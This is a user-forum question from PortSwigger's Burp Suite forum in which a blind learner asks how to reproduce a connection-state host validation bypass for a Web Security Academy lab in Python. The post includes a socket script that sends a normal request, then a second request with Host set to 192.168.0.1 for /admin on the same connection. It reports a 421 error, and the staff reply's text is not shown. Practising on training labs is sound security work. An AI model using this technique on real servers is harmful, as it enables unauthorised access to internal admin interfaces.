Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

How can I replicate the "Send group in sequence (simple connection)" using python?

Alejandro | Last updated: Aug 17, 2024 05:10PM UTC

Hello, I am working on the lab "Host validation bypass via connection state attack," which requires sending two HTTP requests over a single connection to trick the server into believing that both requests are directed to the same host. As a blind user, creating tab groups in Burp Suite is quite challenging for me, so I tried replicating the "Send group in sequence" functionality using Python. However, no matter how I implement it, I always receive a `421 (Misdirected Request)` error in response to my second request, while the same steps work perfectly fine when using Burp. Here’s the code I’ve been using: import socket import ssl host = 'my_lab_id.h1-web-security-academy.net' port = 443 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) context = ssl.create_default_context() ssock = context.wrap_socket(sock, server_hostname=host) ssock.connect((host, port)) requests = [ f"GET / HTTP/1.1\r\nHost: {host}\r\nConnection: keep-alive\r\n\r\n", f"GET /admin HTTP/1.1\r\nHost: 192.168.0.1\r\nConnection: keep-alive\r\n\r\n" ] for request in requests: ssock.sendall(request.encode()) for i in range(len(requests)): response = b'' while True: part = ssock.recv(1024) response += part if len(part) < 1024: break print(f"Response {i + 1}:\n{response.decode()}") Does anyone know why this approach isn't working, or how I might modify it to successfully bypass the host validation? Thanks in advance for any help!

Hannah, PortSwigger Agent | Last updated: Aug 20, 2024 11:55AM UTC